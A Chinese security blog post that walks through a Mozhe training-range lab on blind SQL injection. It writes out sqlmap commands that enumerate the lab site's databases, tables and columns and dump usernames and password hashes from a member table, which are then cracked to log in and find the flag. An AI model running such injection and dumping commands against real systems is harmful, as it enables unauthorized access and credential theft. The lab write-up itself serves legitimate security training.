freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

墨者靶场SQL盲注(入门)
2021-04-09 11:25:43

1617938434_606fc8028fd845a0831a1.png!small

1.打开靶场,看到此处(主要是针对SQL注入,所有直接找注入点,登录先不看)

1617938464_606fc820493a7e4acaa4b.png!small

2.看到了平台停机维护,看到URL的参数id,下意识以为找到位置了

1617938527_606fc85f517d45f28e88a.png!small

3.放到神器sqlmap跑一下看看,发现目标!

1617938588_606fc89cbe030703f6f07.png!small

4.继续爆破数据库、表、用户名密码

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 --dbs

1617938629_606fc8c507cc565e9f7fb.png!small

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup --tables

1617938638_606fc8cea8bb848f08059.png!small

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member --columns

1617938647_606fc8d7e8447b2c03a64.png!small

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member -C name,password --dump

1617938657_606fc8e18fdf891a8139e.png!small

5.获取密码后,发现是md5加密,进行解密后发现第二账号可以登录,登录后即可看到KEY

1617938667_606fc8eb6bb83eaa159c8.png!small

# 渗透测试 # web安全 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者